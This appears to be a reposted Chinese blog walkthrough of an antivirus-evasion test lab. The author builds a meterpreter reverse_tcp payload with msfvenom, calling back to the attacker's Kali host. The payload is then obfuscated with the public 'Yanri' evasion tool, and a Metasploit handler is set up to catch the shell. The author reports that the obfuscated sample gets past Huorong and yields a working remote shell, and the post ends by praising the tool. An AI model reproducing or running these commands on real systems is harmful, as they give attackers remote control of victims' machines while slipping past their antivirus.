掩日免杀笔记_在线笔记

大家好，又见面了，我是你们的朋友全栈君。

微信公众号：乌鸦安全

扫取二维码获取更多信息！

掩日免杀笔记_在线笔记

1. 环境

攻击机： kali linux 10.211.55.23

受害机： Windows10 360主动防御

Windows7 火绒主动防御

2. 生成exe文件

在kali linux下使用msfvenom生成一个64位的exe文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe -o 1.exe

掩日免杀笔记_在线笔记

将文件分别发送至Windows10上，此时需要将受害者的机器关闭全部杀软

使用掩日3.0进行免杀处理（这里会提示报错，需要安装一个软件，按照提示安装即可）

下载地址：

https://github.com/1y0n/av_evasion_tool/

将文件直接拖过来就行了

掩日免杀笔记_在线笔记

最后会生成一个YR_1.exe文件

掩日免杀笔记_在线笔记

将这两个文件分别压缩备份，发送到window10和window7上

掩日免杀笔记_在线笔记

3. 静态测试

打开各自的杀软进行测试

3.1 360

掩日免杀笔记_在线笔记

均报毒

3.2 火绒

掩日免杀笔记_在线笔记

只有一个文件报毒

4. 上线测试

4.1 攻击机配置

msfconsole



use exploit/multi/handler

set LHOST 10.211.55.23

set LPORT 4444

set payload windows/x64/meterpreter/reverse_tcp

exploit

掩日免杀笔记_在线笔记

4.2 360下

4.2.1 1..exe

直接gg

掩日免杀笔记_在线笔记

4.2.2 免杀版1.exe

直接gg

掩日免杀笔记_在线笔记

4.3 火绒

4.3.1. 1.exe

gg

掩日免杀笔记_在线笔记

4.3.2 免杀版1.exe

上线正常

掩日免杀笔记_在线笔记

执行命令

掩日免杀笔记_在线笔记

5. 总结

总体上来说，这款免杀工具已经是非常强了，而且公开了这么久，还支持部分免杀，很厉害了！👍

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/171412.html原文链接：https://javaforall.cn

【